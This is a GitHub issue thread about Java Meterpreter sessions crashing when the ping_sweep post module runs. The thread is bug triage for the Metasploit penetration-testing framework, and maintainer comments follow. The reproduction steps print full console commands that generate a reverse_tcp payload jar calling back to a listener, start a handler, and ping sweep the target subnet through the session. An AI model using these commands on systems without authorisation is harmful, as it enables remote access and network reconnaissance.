### ISSUE TITLE
Java Meterpreter crashes

### ISSUE THREAD

**Issue by todb-r7** [rapid7/meterpreter#95]
*This issue was [RM8824](https://dev.metasploit.com/redmine/issues/8824), filed by @rsmudge*

To reproduce:
(1) Generate a .jar file for Java Meterpreter
````
msf > use payload/java/meterpreter/reverse_tcp 
msf payload(reverse_tcp) > set LPORT 4444
LPORT => 4444
msf payload(reverse_tcp) > set LHOST 172.16.4.207 
LHOST => 172.16.4.207
msf payload(reverse_tcp) > generate -t raw -f /root/test.jar
[*] Writing 5506 bytes to /root/test.jar...
````

(2) Create a handler for Java Meterpreter
````
msf payload(reverse_tcp) > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 172.16.4.207 
LHOST => 172.16.4.207
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.4.207:4444 
msf exploit(handler) > [*] Starting the payload handler...
(3) Run Java Meterpreter on Metasploitable 2 [or anywhere else]
msfadmin@metasploitable:~$ java -jar test.jar
(4) Try to ping sweep [and watch the session die]
msf exploit(handler) > use post/multi/gather/ping_sweep 
msf post(ping_sweep) > set RHOSTS 172.16.4.0/24
RHOSTS => 172.16.4.0/24
msf post(ping_sweep) > set SESSION 1
SESSION => 1
msf post(ping_sweep) > exploit -j
[*] Post module running as background job
msf post(ping_sweep) > 
[*] Performing ping sweep for IP range 172.16.4.0/24
[*] 192.168.95.188 - Meterpreter session 1 closed. Reason: Died
````

I'm able to reproduce this crash with Java on MacOS X as well. This is a new behavior. I have several free labs I make available for folks to learn about MSF and Armitage. This workflow is part of those labs and has never had a problem before. I suspect this behavior was introduced after April 2014.

A little about me:

````
ruby -v
ruby 1.9.3p0 (2011-10-30 revision 33570) [i686-linux]
git log
commit f8ef6c50b4d44a98eb7e36e352bdc88b0bcf8b1e
````

There is suspicion that this was fixed as part of rapid7/metasploit-framework#3498 , and while source was updated, the binaries were not. This should be confirmed before anything.

**Comment by bcook-r7** [comment]
Worked well for me as part of rapid7/metasploit-javapayload#23

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > setg lhost 192.168.22.66
lhost => 192.168.22.66
msf exploit(handler) > run

[*] Started reverse handler on 192.168.22.66:4444
[*] Starting the payload handler...
[*] Sending stage (43586 bytes) to 192.168.22.46

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/multi/gather/ping_sweep
msf post(ping_sweep) > set rhosts 192.168.22.0/24
rhosts => 192.168.22.0/24
msf post(ping_sweep) > set session 1
session => 1
msf post(ping_sweep) > run

[*] Performing ping sweep for IP range 192.168.22.0/24
[*] Post module execution completed
```

**Comment by bcook-r7** [comment]
I merged rapid7/metasploit-javapayload#17 along with other things. Will do a PR for updated binaries once I've tested a couple more PRs.
